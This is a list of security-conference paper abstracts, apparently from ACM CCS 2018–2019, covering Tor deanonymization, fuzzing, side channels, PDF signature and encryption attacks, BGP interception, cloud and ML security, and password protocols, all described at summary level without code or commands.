DeepCorr: Strong Flow Correlation Attacks on Tor Using Deep Learning

Flow correlation is the core technique used in a multitude of deanonymization attacks on Tor. Despite the importance of flow correlation attacks on Tor, existing flow correlation techniques are considered to be ineffective and unreliable in linking Tor flows when applied at a large scale, i.e., they impose high rates of false positive error rates or require impractically long flow observations to be able to make reliable correlations. In this paper, we show that, unfortunately, flow correlation attacks can be conducted on Tor traffic with drastically higher accuracies than before by leveraging emerging learning mechanisms. We particularly design a system, called DeepCorr, that outperforms the state-of-the-art by significant margins in correlating Tor connections. DeepCorr leverages an advanced deep learning architecture to learn a flow correlation function tailored to Tor’s complex network- this is in contrast to previous works’ use of generic statistical correlation metrics to correlate Tor flows. We show that with moderate learning, DeepCorr can correlate Tor connections (and therefore break its anonymity) with accuracies significantly higher than existing algorithms, and using substantially shorter lengths of flow observations. For instance, by collecting only about 900 packets of each target Tor flow (roughly 900KB of Tor data), DeepCorr provides a flow correlation accuracy of 96% compared to 4% by the state-of-the-art system of RAPTOR using the same exact setting. We hope that our work demonstrates the escalating threat of flow correlation attacks on Tor given recent advances in learning algorithms, calling for the timely deployment of effective countermeasures by the Tor community.

Measuring Information Leakage in Website Fingerprinting Attacks and Defenses

Tor provides low-latency anonymous and uncensored network access against a local or network adversary. Due to the design choice to minimize traffic overhead (and increase the pool of potential users) Tor allows some information about the client’s connections to leak. Attacks using (features extracted from) this information to infer the website a user visits are called Website Fingerprinting (WF) attacks. We develop a methodology and tools to measure the amount of leaked information about a website. We apply this tool to a comprehensive set of features extracted from a large set of websites and WF defense mechanisms, allowing us to make more fine-grained observations about WF attacks and defenses.

Session 10D: Fuzzing, Exploitation, and Side Channels

Hawkeye: Towards a Desired Directed Grey-box Fuzzer

Grey-box fuzzing is a practically effective approach to test real-world programs. However, most existing grey-box fuzzers lack directedness, i.e. the capability of executing towards user-specified target sites in the program. To emphasize existing challenges in directed fuzzing, we propose Hawkeye to feature four desired properties of directed grey-box fuzzers. Owing to a novel static analysis on the program under test and the target sites, Hawkeye precisely collects the information such as the call graph, function and basic block level distances to the targets. During fuzzing, Hawkeye evaluates exercised seeds based on both static information and the execution traces to generate the dynamic metrics, which are then used for seed prioritization, power scheduling and adaptive mutating. These strategies help Hawkeye to achieve better directedness and gravitate towards the target sites. We implemented Hawkeye as a fuzzing framework and evaluated it on various real-world programs under different scenarios. The experimental results showed that Hawkeye can reach the target sites and reproduce the crashes much faster than state-of-the-art grey-box fuzzers such as AFL and AFLGo. Specially, Hawkeye can reduce the time to exposure for certain vulnerabilities from about 3.5 hours to 0.5 hour. By now, Hawkeye has detected more than 41 previously unknown crashes in projects such as Oniguruma, MJS with the target sites provided by vulnerability prediction tools; all these crashes are confirmed and 15 of them have been assigned CVE IDs.

ret2spec: Speculative Execution Using Return Stack Buffers

Speculative execution is an optimization technique that has been part of CPUs for over a decade. It predicts the outcome and target of branch instructions to avoid stalling the execution pipeline. However, until recently, the security implications of speculative code execution have not been studied. In this paper, we investigate a special type of branch predictor that is responsible for predicting return addresses. To the best of our knowledge, we are the first to study return address predictors and their consequences for the security of modern software. In our work, we show how return stack buffers (RSBs), the core unit of return address predictors, can be used to trigger misspeculations. Based on this knowledge, we propose two new attack variants using RSBs that give attackers similar capabilities as the documented Spectre attacks. We show how local attackers can gain arbitrary speculative code execution across processes, e.g., to leak passwords another user enters on a shared system. Our evaluation showed that the recent Spectre countermeasures deployed in operating systems can also cover such RSB-based cross-process attacks. Yet we then demonstrate that attackers can trigger misspeculation in JIT environments in order to leak arbitrary memory content of browser processes. Reading outside the sandboxed memory region with JIT-compiled code is still possible with 80% accuracy on average.

Evaluating Fuzz Testing

Fuzz testing has enjoyed great success at discovering security critical bugs in real software. Recently, researchers have devoted significant effort to devising new fuzzing techniques, strategies, and algorithms. Such new ideas are primarily evaluated experimentally so an important question is: What experimental setup is needed to produce trustworthy results? We surveyed the recent research literature and assessed the experimental evaluations carried out by 32 fuzzing papers. We found problems in every evaluation we considered. We then performed our own extensive experimental evaluation using an existing fuzzer. Our results showed that the general problems we found in existing experimental evaluations can indeed translate to actual wrong or misleading assessments. We conclude with some guidelines that we hope will help improve experimental evaluations of fuzz testing algorithms, making reported results more robust.

Rendered Insecure: GPU Side Channel Attacks are Practical

Graphics Processing Units (GPUs) are commonly integrated with computing devices to enhance the performance and capabilities of graphical workloads. In addition, they are increasingly being integrated in data centers and clouds such that they can be used to accelerate data intensive workloads. Under a number of scenarios the GPU can be shared between multiple applications at a fine granularity allowing a spy application to monitor side channels and attempt to infer the behavior of the victim. For example, OpenGL and WebGL send workloads to the GPU at the granularity of a frame, allowing an attacker to interleave the use of the GPU to measure the side-effects of the victim computation through performance counters or other resource tracking APIs. We demonstrate the vulnerability using two applications. First, we show that an OpenGL based spy can fingerprint websites accurately, track user activities within the website, and even infer the keystroke timings for a password text box with high accuracy. The second application demonstrates how a CUDA spy application can derive the internal parameters of a neural network model being used by another CUDA application, illustrating these threats on the cloud. To counter these attacks, the paper suggests mitigations based on limiting the rate of the calls, or limiting the granularity of the returned information.

2019 Proceedings dblp

Session 1A: Attack I

1 Trillion Dollar Refund: How To Spoof PDF Signatures

The Portable Document Format (PDF) is the de-facto standard for document exchange worldwide. To guarantee the authenticity and integrity of documents, digital signatures are used. Several public and private services ranging from governments, public enterprises, banks, and payment services rely on the security of PDF signatures.

In this paper, we present the first comprehensive security evaluation on digital signatures in PDFs. We introduce three novel attack classes which bypass the cryptographic protection of digitally signed PDF files allowing an attacker to spoof the content of a signed PDF. We analyzed 22 different PDF viewers and found 21 of them to be vulnerable, including prominent and widely used applications such as Adobe Reader DC and Foxit. We additionally evaluated eight online validation services and found six to be vulnerable. A possible explanation for these results could be the absence of a standard algorithm to verify PDF signatures – each client verifies signatures differently, and attacks can be tailored to these differences. We, therefore, propose the standardization of a secure verification algorithm, which we describe in this paper.

All findings have been responsibly disclosed, and the affected vendors were supported during fixing the issues. As a result, three generic CVEs for each attack class were issued [50-52]. Our research on PDF signatures and more information is also online available at https://www.pdf-insecurity.org/.

Practical Decryption exFiltration: Breaking PDF Encryption

The Portable Document Format, better known as PDF, is one of the most widely used document formats worldwide, and in order to ensure information confidentiality, this file format supports document encryption. In this paper, we analyze PDF encryption and show two novel techniques for breaking the confidentiality of encrypted documents. First, we abuse the PDF feature of partially encrypted documents to wrap the encrypted part of the document within attacker-controlled content and therefore, exfiltrate the plaintext once the document is opened by a legitimate user. Second, we abuse a flaw in the PDF encryption specification to arbitrarily manipulate encrypted content. The only requirement is that a single block of known plaintext is needed, and we show that this is fulfilled by design. Our attacks allow the recovery of the entire plaintext of encrypted documents by using exfiltration channels which are based on standard compliant PDF properties. We evaluated our attacks on 27 widely used PDF viewers and found all of them to be vulnerable. We responsibly disclosed the vulnerabilities and supported the vendors in fixing the issues.

Session 1C: Cloud Security I

A Machine-Checked Proof of Security for AWS Key Management Service

We present a machine-checked proof of security for the domain management protocol of Amazon Web Services’ KMS (Key Management Service) a critical security service used throughout AWS and by AWS customers. Domain management is at the core of AWS KMS; it governs the top-level keys that anchor the security of encryption services at AWS. We show that the protocol securely implements an ideal distributed encryption mechanism under standard cryptographic assumptions. The proof is machine-checked in the EasyCrypt proof assistant and is the largest EasyCrypt development to date.

Mitigating Leakage in Secure Cloud-Hosted Data Structures: Volume-Hiding for Multi-Maps via Hashing

Volume leakage has recently been identified as a major threat to the security of cryptographic cloud-based data structures by Kellaris \em et al. [CCS’16] (see also the attacks in Grubbs \em et al. [CCS’18] and Lacharité \em et al. [S&P’18]). In this work, we focus on volume-hiding implementations of \em encrypted multi-maps as first considered by Kamara and Moataz [Eurocrypt’19]. Encrypted multi-maps consist of outsourcing the storage of a multi-map to an untrusted server, such as a cloud storage system, while maintaining the ability to perform private queries. Volume-hiding encrypted multi-maps ensure that the number of responses (volume) for any query remains hidden from the adversarial server. As a result, volume-hiding schemes can prevent leakage attacks that leverage the adversary’s knowledge of the number of query responses to compromise privacy. We present both conceptual and algorithmic contributions towards volume-hiding encrypted multi-maps. We introduce the first formal definition of volume-hiding leakage functions. In terms of design, we present the first volume-hiding encrypted multi-map dprfMM whose storage and query complexity are both asymptotically optimal. Furthermore, we experimentally show that our construction is practically efficient. Our server storage is smaller than the best previous construction while we improve query complexity by a factor of 10-16x. In addition, we introduce the notion of differentially private volume-hiding leakage functions which strikes a better, tunable balance between privacy and efficiency. To accompany our new notion, we present a differentially private volume-hiding encrypted multi-map dpMM whose query complexity is the volume of the queried key plus an additional logarithmic factor. This is a significant improvement compared to all previous volume-hiding schemes whose query overhead was the maximum volume of any key. In natural settings, our construction improves the average query overhead by a factor of 150-240x over the previous best volume-hiding construction even when considering small privacy budget of ε=0.2.

Session 2B: ML Security I

Neural Network Inversion in Adversarial Setting via Background Knowledge Alignment

The wide application of deep learning technique has raised new security concerns about the training data and test data. In this work, we investigate the model inversion problem under adversarial settings, where the adversary aims at inferring information about the target model’s training data and test data from the model’s prediction values. We develop a solution to train a second neural network that acts as the inverse of the target model to perform the inversion. The inversion model can be trained with black-box accesses to the target model. We propose two main techniques towards training the inversion model in the adversarial settings. First, we leverage the adversary’s background knowledge to compose an auxiliary set to train the inversion model, which does not require access to the original training data. Second, we design a truncation-based technique to align the inversion model to enable effective inversion of the target model from partial predictions that the adversary obtains on victim user’s data. We systematically evaluate our approach in various machine learning tasks and model architectures on multiple image datasets. We also confirm our results on Amazon Rekognition, a commercial prediction API that offers “machine learning as a service”. We show that even with partial knowledge about the black-box model’s training data, and with only partial prediction values, our inversion approach is still able to perform accurate inversion of the target model, and outperform previous approaches.

Privacy Risks of Securing Machine Learning Models against Adversarial Examples

The arms race between attacks and defenses for machine learning models has come to a forefront in recent years, in both the security community and the privacy community. However, one big limitation of previous research is that the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards resolving this limitation by combining the two domains. In particular, we measure the success of membership inference attacks against six state-of-the-art defense methods that mitigate the risk of adversarial examples (i.e., evasion attacks). Membership inference attacks determine whether or not an individual data record has been part of a model’s training set. The accuracy of such attacks reflects the information leakage of training algorithms about individual members of the training set. Adversarial defense methods against adversarial examples influence the model’s decision boundaries such that model predictions remain unchanged for a small area around each input. However, this objective is optimized on training data. Thus, individual data records in the training set have a significant influence on robust models. This makes the models more vulnerable to inference attacks. To perform the membership inference attacks, we leverage the existing inference methods that exploit model predictions. We also propose two new inference methods that exploit structural properties of robust models on adversarially perturbed data. Our experimental evaluation demonstrates that compared with the natural training (undefended) approach, adversarial defense methods can indeed increase the target model’s risk against membership inference attacks. When using adversarial defenses to train the robust models, the membership inference advantage increases by up to 4.5 times compared to the naturally undefended models. Beyond revealing the privacy risks of adversarial defenses, we further investigate the factors, such as model capacity, that influence the membership information leakage.

MemGuard: Defending against Black-Box Membership Inference Attacks via Adversarial Examples

In a membership inference attack, an attacker aims to infer whether a data sample is in a target classifier’s training dataset or not. Specifically, given a black-box access to the target classifier, the attacker trains a binary classifier, which takes a data sample’s confidence score vector predicted by the target classifier as an input and predicts the data sample to be a member or non-member of the target classifier’s training dataset. Membership inference attacks pose severe privacy and security threats to the training dataset. Most existing defenses leverage differential privacy when training the target classifier or regularize the training process of the target classifier. These defenses suffer from two key limitations: 1) they do not have formal utility-loss guarantees of the confidence score vectors, and 2) they achieve suboptimal privacy-utility tradeoffs. In this work, we propose MemGuard,the first defense with formal utility-loss guarantees against black-box membership inference attacks. Instead of tampering the training process of the target classifier, MemGuard adds noise to each confidence score vector predicted by the target classifier. Our key observation is that attacker uses a classifier to predict member or non-member and classifier is vulnerable to adversarial examples.Based on the observation, we propose to add a carefully crafted noise vector to a confidence score vector to turn it into an adversarial example that misleads the attacker’s classifier. Specifically, MemGuard works in two phases. In Phase I, MemGuard finds a carefully crafted noise vector that can turn a confidence score vector into an adversarial example, which is likely to mislead the attacker’s classifier to make a random guessing at member or non-member. We find such carefully crafted noise vector via a new method that we design to incorporate the unique utility-loss constraints on the noise vector. In Phase II, MemGuard adds the noise vector to the confidence score vector with a certain probability, which is selected to satisfy a given utility-loss budget on the confidence score vector. Our experimental results on three datasets show that MemGuard can effectively defend against membership inference attacks and achieve better privacy-utility tradeoffs than existing defenses. Our work is the first one to show that adversarial examples can be used as defensive mechanisms to defend against membership inference attacks.

Procedural Noise Adversarial Examples for Black-Box Attacks on Deep Convolutional Networks

Deep Convolutional Networks (DCNs) have been shown to be vulnerable to adversarial examples—perturbed inputs specifically designed to produce intentional errors in the learning algorithms at test time. Existing input-agnostic adversarial perturbations exhibit interesting visual patterns that are currently unexplained. In this paper, we introduce a structured approach for generating Universal Adversarial Perturbations (UAPs) with procedural noise functions. Our approach unveils the systemic vulnerability of popular DCN models like Inception v3 and YOLO v3, with single noise patterns able to fool a model on up to 90% of the dataset. Procedural noise allows us to generate a distribution of UAPs with high universal evasion rates using only a few parameters. Additionally, we propose Bayesian optimization to efficiently learn procedural noise parameters to construct inexpensive untargeted black-box attacks. We demonstrate that it can achieve an average of less than 10 queries per successful attack, a 100-fold improvement on existing methods. We further motivate the use of input-agnostic defences to increase the stability of models to adversarial perturbations. The universality of our attacks suggests that DCN models may be sensitive to aggregations of low-level class-agnostic features. These findings give insight on the nature of some universal adversarial perturbations and how they could be generated in other applications.

Session 2E: Internet Security

SICO: Surgical Interception Attacks by Manipulating BGP Communities

The Border Gateway Protocol (BGP) is the primary routing protocol for the Internet backbone, yet it lacks adequate security mechanisms. While simple BGP hijack attacks only involve an adversary hijacking Internet traffic destined to a victim, more complex and challenging interception attacks require that adversary intercept a victim’s traffic and forward it on to the victim. If an interception attack is launched incorrectly, the adversary’s attack will disrupt its route to the victim making it impossible to forward packets. To overcome these challenges, we introduce SICO attacks (Surgical Interception using COmmunities): a novel method of launching interception attacks that leverages BGP communities to scope an adversary’s attack and ensure a route to the victim. We then show how SICO attacks can be targeted to specific source IP addresses for reducing attack costs. Furthermore, we ethically perform SICO attacks on the real Internet backbone to evaluate their feasibility and effectiveness. Results suggest that SICO attacks can achieve interception even when previously proposed attacks would not be feasible and outperforms them by attracting traffic from an additional 16% of Internet hosts (worst case) and 58% of Internet hosts (best case). Finally, we analyze the Internet topology to find that at least 83% of multi-homed ASes are capable of launching these attacks.

Just the Tip of the Iceberg: Internet-Scale Exploitation of Routers for Cryptojacking

The release of an efficient browser-based cryptominer, as introduced by Coinhive in 2017, has quickly spread throughout the web either as a new source of revenue for websites or exploited within the context of hacks and malicious advertisements. Several studies have analyzed the Alexa Top 1M and found 380 - 3,200 (0.038% - 0.32%) to be actively mining, with an estimated $41,000 per month revenue for the top 10 perpetrators. While placing a cryptominer on a popular website supplies considerable returns from its visitors’ web browsers, it only generates revenue while a client is visiting the page. Even though large popular websites attract millions of visitors, the relatively low number of exploiting websites limits the total revenue that can be made. In this paper, we report on a new attack vector that drastically overshadows all existing cryptojacking activity discovered to date. Through a firmware vulnerability in MikroTik routers, cyber criminals are able to rewrite outgoing user traffic and embed cryptomining code in every outgoing web connection. Thus, every web page visited by any user behind an infected router would mine to profit the criminals. Based on NetFlows recorded in a Tier 1 network, semiweekly crawls and telescope traffic, we followed their activities over a period of 10 months, and report on the modus operandi and coordinating infrastructure of the perpetrators, which were during this period in control of up to 1.4M routers, approximately 70% of all MikroTik devices deployed worldwide. We observed different levels of sophistication among adversaries, ranging from individual installations to campaigns involving large numbers of routers. Our results show that cryptojacking through MITM attacks is highly lucrative, a factor of 30 more than previous attack vectors.

Network Hygiene, Incentives, and Regulation: Deployment of Source Address Validation in the Internet

The Spoofer project has collected data on the deployment and characteristics of IP source address validation on the Internet since 2005. Data from the project comes from participants who install an active probing client that runs in the background. The client automatically runs tests both periodically and when it detects a new network attachment point. We analyze the rich dataset of Spoofer tests in multiple dimensions: across time, networks, autonomous systems, countries, and by Internet protocol version. In our data for the year ending August 2019, at least a quarter of tested ASes did not filter packets with spoofed source addresses leaving their networks. We show that routers performing Network Address Translation do not always filter spoofed packets, as 6.4% of IPv4/24 tested in the year ending August 2019 did not filter. Worse, at least two thirds of tested ASes did not filter packets entering their networks with source addresses claiming to be from within their network that arrived from outside their network. We explore several approaches to encouraging remediation and the challenges of evaluating their impact. While we have been able to remediate 352 IPv4/24, we have found an order of magnitude more IPv4/24 that remains unremediated, despite myriad remediation strategies, with 21% unremediated for more than six months. Our analysis provides the most complete and confident picture of the Internet’s susceptibility to date of this long-standing vulnerability. Although there is no simple solution to address the remaining long-tail of unremediated networks, we conclude with a discussion of possible non-technical interventions, and demonstrate how the platform can support evaluation of the impact of such interventions over time.

Security Certification in Payment Card Industry: Testbeds, Measurements, and Recommendations

The massive payment card industry (PCI) involves various entities such as merchants, issuer banks, acquirer banks, and card brands. Ensuring security for all entities that process payment card information is a challenging task. The PCI Security Standards Council requires all entities to be compliant with the PCI Data Security Standard (DSS), which specifies a series of security requirements. However, little is known regarding how well PCI DSS is enforced in practice. In this paper, we take a measurement approach to systematically evaluate the PCI DSS certification process for e-commerce websites. We develop an e-commerce web application testbed, BuggyCart, which can flexibly add or remove 35 PCI DSS related vulnerabilities. Then we use the testbed to examine the capability and limitations of PCI scanners and the rigor of the certification process. We find that there is an alarming gap between the security standard and its real-world enforcement. None of the 6 PCI scanners we tested are fully compliant with the PCI scanning guidelines, issuing certificates to merchants that still have major vulnerabilities. To further examine the compliance status of real-world e-commerce websites, we build a new lightweight scanning tool named PciCheckerLite and scan 1,203 e-commerce websites across various business sectors. The results confirm that 86% of the websites have at least one PCI DSS violation that should have disqualified them as non-compliant. Our in-depth accuracy analysis also shows that PciCheckerLite’s output is more precise than w3af. We reached out to the PCI Security Council to share our research results to improve the enforcement in practice.

Session 3A: Fuzzing: Methods and Applications

Matryoshka: Fuzzing Deeply Nested Branches

Greybox fuzzing has made impressive progress in recent years, evolving from heuristics-based random mutation to approaches for solving individual branch constraints. However, they have difficulty solving path constraints that involve deeply nested conditional statements, which are common in image and video decoders, network packet analyzers, and checksum tools. We propose an approach for addressing this problem. First, we identify all the control flow-dependent conditional statements of the target conditional statement. Next, we select the taint flow-dependent conditional statements. Finally, we use three strategies to find an input that satisfies all conditional statements simultaneously. We implemented this approach in a tool called Matryoshka and compared its effectiveness on 13 open source programs against other state-of-the-art fuzzers. Matryoshka has significantly higher cumulative line and branch coverage than AFL, QSYM, and Angora. We manually classified the crashes found by Matryoshka into 41 unique new bugs and obtained 12 CVEs. Our evaluation also uncovered the key technique contributing to Matryoshka’s impressive performance: it collects only the nesting constraints that may cause the target conditional statement unreachable, which greatly simplifies the path constraints that it has to solve.

Intriguer: Field-Level Constraint Solving for Hybrid Fuzzing

Hybrid fuzzing, which combines fuzzing and concolic execution, is promising in light of the recent performance improvements in concolic engines. We have observed that there is room for further improvement: symbolic emulation is still slow, unnecessary constraints dominate solving time, resources are overly allocated, and hard-to-trigger bugs are missed. To address these problems, we present a new hybrid fuzzer named Intriguer. The key idea of Intriguer is field-level constraint solving, which optimizes symbolic execution with field-level knowledge. Intriguer performs instruction-level taint analysis and records execution traces without data transfer instructions like mov. Intriguer then reduces the execution traces for tainted instructions that accessed a wide range of input bytes, and infers input fields to build field transition trees. With these optimizations, Intriguer can efficiently perform symbolic emulation for more relevant instructions and invoke a solver for complicated constraints only. Our evaluation results indicate that Intriguer outperforms the state-of-the-art fuzzers: Intriguer found all the bugs in the LAVA-M(5h) benchmark dataset for ground truth performance, and also discovered 43 new security bugs in seven real-world programs. We reported the bugs and received 23 new CVEs.

Learning to Fuzz from Symbolic Execution with Application to Smart Contracts

Fuzzing and symbolic execution are two complementary techniques for discovering software vulnerabilities. Fuzzing is fast and scalable, but can be ineffective when it fails to randomly select the right inputs. Symbolic execution is thorough but slow and often does not scale to deep program paths with complex path conditions. In this work, we propose to learn an effective and fast fuzzer from symbolic execution, by phrasing the learning task in the framework of imitation learning. During learning, a symbolic execution expert generates a large number of quality inputs improving coverage on thousands of programs. Then, a fuzzing policy, represented with a suitable architecture of neural networks, is trained on the generated dataset. The learned policy can then be used to fuzz new programs. We instantiate our approach to the problem of fuzzing smart contracts, a domain where contracts often implement similar functionality (facilitating learning) and security is of utmost importance. We present an end-to-end system, ILF (for Imitation Learning based Fuzzer), and an extensive evaluation over >18K contracts. Our results show that ILF is effective: (i) it is fast, generating 148 transactions per second, (ii) it outperforms existing fuzzers (e.g., achieving 33% more coverage), and (iii) it detects more vulnerabilities than existing fuzzing and symbolic execution tools for Ethereum.

Session 5C: Cloud Security II

Houdini’s Escape: Breaking the Resource Rein of Linux Control Groups

Linux Control Groups, i.e., cgroups, are the key building blocks to enable operating-system-level containerization. The cgroups mechanism partitions processes into hierarchical groups and applies different controllers to manage system resources, including CPU, memory, block I/O, etc. Newly spawned child processes automatically copy cgroups attributes from their parents to enforce resource control. Unfortunately, inherited cgroups confinement via process creation does not always guarantee consistent and fair resource accounting. In this paper, we devise a set of exploiting strategies to generate out-of-band</>workloads via de-associating processes from their original process groups. The system resources consumed by such workloads will not be charged to the appropriate cgroups. To further demonstrate the feasibility, we present five case studies within Docker containers to demonstrate how to break the resource rein of cgroups in realistic scenarios. Even worse, by exploiting those cgroups’ insufficiencies in a multi-tenant container environment, an adversarial container is able to greatly amplify the amount of consumed resources, significantly slow-down other containers on the same host, and gain extra unfair advantages on the system resources. We conduct extensive experiments on both a local testbed and an Amazon EC2 cloud dedicated server. The experimental results demonstrate that a container can consume system resources (e.g., CPU) as much as $200\times$ of its limit, and reduce both computing and I/O performance of particular workloads in other co-resident containers by 95%.

Insecure Until Proven Updated: Analyzing AMD SEV’s Remote Attestation

Cloud computing is one of the most prominent technologies to host Internet services that unfortunately leads to an increased risk of data theft. Customers of cloud services have to trust the cloud providers, as they control the building blocks that form the cloud. This includes the hypervisor enabling the sharing of a single hardware platform among multiple tenants. Executing in a higher-privileged CPU mode, the hypervisor has direct access to the memory of virtual machines. While data at rest can be protected using well-known disk encryption methods, data residing in main memory is still threatened by a potentially malicious cloud provider. AMD Secure Encrypted Virtualization (SEV) claims a new level of protection in such cloud scenarios. AMD SEV encrypts the main memory of virtual machines with VM-specific keys, thereby denying the higher-privileged hypervisor access to a guest’s memory. To enable the cloud customer to verify the correct deployment of his virtual machine, SEV additionally introduces a remote attestation protocol. This protocol is a crucial component of the SEV technology that can prove that SEV protection is in place and that the virtual machine was not subject to manipulation. This paper analyzes the firmware components that implement the SEV remote attestation protocol on the current AMD Epyc Naples CPU series. We demonstrate that it is possible to extract critical</> CPU-specific keys that are fundamental for the security of the remote attestation protocol. Building on the extracted keys, we propose attacks that allow a malicious cloud provider a complete circumvention of the SEV protection mechanisms. Although the underlying firmware issues were already fixed by AMD, we show that the current series of AMD Epyc CPUs, i.e., the Naples series, does not prevent the installation of previous firmware versions. We show that the severity of our proposed attacks is very high as no purely software-based mitigations are possible. This effectively renders the SEV technology on current AMD Epyc CPUs useless when confronted with an untrusted cloud provider. To overcome these issues, we also propose robust changes to the SEV design that allow future generations of the SEV technology to mitigate the proposed attacks.

Session 5E: Fingerprinting

Triplet Fingerprinting: More Practical and Portable Website Fingerprinting with N-shot Learning

Website Fingerprinting (WF) attacks pose a serious threat to users’ online privacy, including for users of the Tor anonymity system. By exploiting recent advances in deep learning, WF attacks like Deep Fingerprinting (DF) have reached up to 98% accuracy. The DF attack, however, requires large amounts of training data that needs to be updated regularly, making it less practical for the weaker attacker model typically assumed in WF. Moreover, research on WF attacks has been criticized for not demonstrating attack effectiveness under more realistic and more challenging scenarios. Most research on WF attacks assumes that the testing and training data have similar distributions and are collected from the same type of network at about the same time. In this paper, we examine how an attacker could leverage N-shot learning—a machine learning technique requiring just a few training samples to identify a given class—to reduce the effort of gathering and training with a large WF dataset as well as mitigate the adverse effects of dealing with different network conditions. In particular, we propose a new WF attack called Triplet Fingerprinting (TF) that uses triplet networks for N-shot learning. We evaluate this attack in challenging settings such as where the training and testing data are collected multiple years apart on different networks, and we find that the TF attack remains effective in such settings with 85% accuracy or better. We also show that the TF attack is also effective in the open world and outperforms traditional transfer learning. On top of that, the attack requires only five examples to recognize a website, making it dangerous in a wide variety of scenarios where gathering and training on a complete dataset would be impractical.

DeMiCPU: Device Fingerprinting with Magnetic Signals Radiated by CPU

With the widespread use of smart devices, device authentication has received much attention. One popular method for device authentication is to utilize internally-measured device fingerprints, such as device ID, software or hardware-based characteristics. In this paper, we propose DeMiCPU, a stimulation-response-based device fingerprinting technique that relies on externally-measured information, i.e., magnetic induction (MI) signals emitted from the CPU module that consists of the CPU chip and its affiliated power supply circuits. The key insight of DeMiCPU is that hardware discrepancies essentially exist among CPU modules and thus the corresponding MI signals make promising device fingerprints, which are difficult to be modified or mimicked. We design a stimulation and a discrepancy extraction scheme and evaluate them with 90 mobile devices, including 70 laptops (among which 30 are of totally identical CPU and operating system) and 20 smartphones. The results show that DeMiCPU can achieve 99.1% precision and recall on average, and 98.6% precision and recall for the 30 identical devices, with a fingerprinting time of 0.6 s. In addition, the performance can be further improved to 99.9% with multi-round fingerprinting.

Session 6B: ML Security II

QUOTIENT: Two-Party Secure Neural Network Training and Prediction

Recently, there has been a wealth of effort devoted to the design of secure protocols for machine learning tasks. Much of this is aimed at enabling secure prediction from highly-accurate Deep Neural Networks (DNNs). However, as DNNs are trained on data, a key question is how such models can be also trained securely. The few prior works on secure DNN training have focused either on designing custom protocols for existing training algorithms, or on developing tailored training algorithms and then applying generic secure protocols. In this work, we investigate the advantages of designing training algorithms alongside a novel secure protocol, incorporating optimizations on both fronts. We present QUOTIENT, a new method for discretized training of DNNs, along with a customized secure two-party protocol for it. QUOTIENT incorporates key components of state-of-the-art DNN training such as layer normalization and adaptive gradient methods, and improves upon the state-of-the-art in DNN training in two-party computation. Compared to prior work, we obtain an improvement of 50X in WAN time and 6% in absolute accuracy.

Quantitative Verification of Neural Networks and Its Security Applications

Neural networks are increasingly employed in safety-critical domains. This has prompted interest in verifying or certifying logically encoded properties of neural networks. Prior work has largely focused on checking existential properties, wherein the goal is to check whether there exists any input that violates a given property of interest. However, neural network training is a stochastic process, and many questions arising in their analysis require probabilistic and quantitative reasoning, i.e., estimating how many inputs satisfy a given property. To this end, our paper proposes a novel and principled framework to quantitative verification of logical properties specified over neural networks. Our framework is the first to provide PAC-style soundness guarantees, in that its quantitative estimates are within a controllable and bounded error from the true count. We instantiate our algorithmic framework by building a prototype tool called NPAQ that enables checking rich properties over binarized neural networks. We show how emerging security analyses can utilize our framework in 3 applications: quantifying robustness to adversarial inputs, efficacy of trojan attacks, and fairness/bias of given neural networks.

ABS: Scanning Neural Networks for Back-doors by Artificial Brain Stimulation

This paper presents a technique to scan neural network based AI models to determine if they are trojaned. Pre-trained AI models may contain back-doors that are injected through training or by transforming inner neuron weights. These trojaned models operate normally when regular inputs are provided, and mis-classify to a specific output label when the input is stamped with some special pattern called trojan trigger. We develop a novel technique that analyzes inner neuron behaviors by determining how output activations change when we introduce different levels of stimulation to a neuron. The neurons that substantially elevate the activation of a particular output label regardless of the provided input is considered potentially compromised. Trojan trigger is then reverse-engineered through an optimization procedure using the stimulation analysis results, to confirm that a neuron is truly compromised. We evaluate our system ABS on 177 trojaned models that are trojaned with various attack methods that target both the input space and the feature space, and have various trojan trigger sizes and shapes, together with 144 benign models that are trained with different data and initial weight values. These models belong to 7 different model structures and 6 different datasets, including some complex ones such as ImageNet, VGG-Face and ResNet110. Our results show that ABS is highly effective, can achieve over 90% detection rate for most cases (and many 100%), when only one input sample is provided for each output label. It substantially out-performs the state-of-the-art technique Neural Cleanse that requires a lot of input samples and small trojan triggers to achieve good performance.

Lifelong Anomaly Detection Through Unlearning

Anomaly detection is essential towards ensuring system security and reliability. Powered by constantly generated system data, deep learning has been found both effective and flexible to use, with its ability to extract patterns without much domain knowledge. Existing anomaly detection research focuses on a scenario referred to as zero-positive, which means that the detection model is only trained for normal (i.e., negative) data. In a real application scenario, there may be additional manually inspected positive data provided after the system is deployed. We refer to this scenario as lifelong anomaly detection. However, we find that existing approaches are not easy to adopt such new knowledge to improve system performance. In this work, we are the first to explore the lifelong anomaly detection problem, and propose novel approaches to handle corresponding challenges. In particular, we propose a framework called unlearning, which can effectively correct the model when a false negative (or a false positive) is labeled. To this aim, we develop several novel techniques to tackle two challenges referred to as exploding loss and catastrophic forgetting. In addition, we abstract a theoretical framework based on generative models. Under this framework, our unlearning approach can be presented in a generic way to be applied to most zero-positive deep learning-based anomaly detection algorithms to turn them into corresponding lifelong anomaly detection solutions. We evaluate our approach using two state-of-the-art zero-positive deep learning anomaly detection architectures and three real-world tasks. The results show that the proposed approach is able to significantly reduce the number of false positives and false negatives through unlearning.

Session 6E: Passwords and Accounts

How to (not) Share a Password: Privacy Preserving Protocols for Finding Heavy Hitters with Adversarial Behavior

Bad choices of passwords were and are a pervasive problem. Users choosing weak passwords do not only compromise themselves, but the whole ecosystem. E.g, common and default passwords in IoT devices were exploited by hackers to create botnets and mount severe attacks on large Internet services, such as the Mirai botnet DDoS attack. We present a method to help protect the Internet from such large scale attacks. Our method enables a server to identify popular passwords (heavy hitters), and publish a list of over-popular passwords that must be avoided. This filter ensures that no single password can be used to compromise a large percentage of the users. The list is dynamic and can be changed as new users are added or when current users change their passwords. We apply maliciously secure two-party computation and differential privacy to protect the users’ password privacy. Our solution does not require extra hardware or cost, and is transparent to the user. Our private heavy hitters construction is secure even against a malicious coalition of devices which tries to manipulate the protocol to hide the popularity of some password that the attacker is exploiting. It also ensures differential privacy under continual observation of the blacklist as it changes over time. As a reality check we conducted three tests: computed the guarantees that the system provides wrt a few publicly available databases, ran full simulations on those databases, and implemented and analyzed a proof-of-concept on an IoT device. Our construction can also be used in other settings to privately learn heavy hitters in the presence of an active malicious adversary. E.g., learning the most popular sites accessed by the Tor network.

Protocols for Checking Compromised Credentials

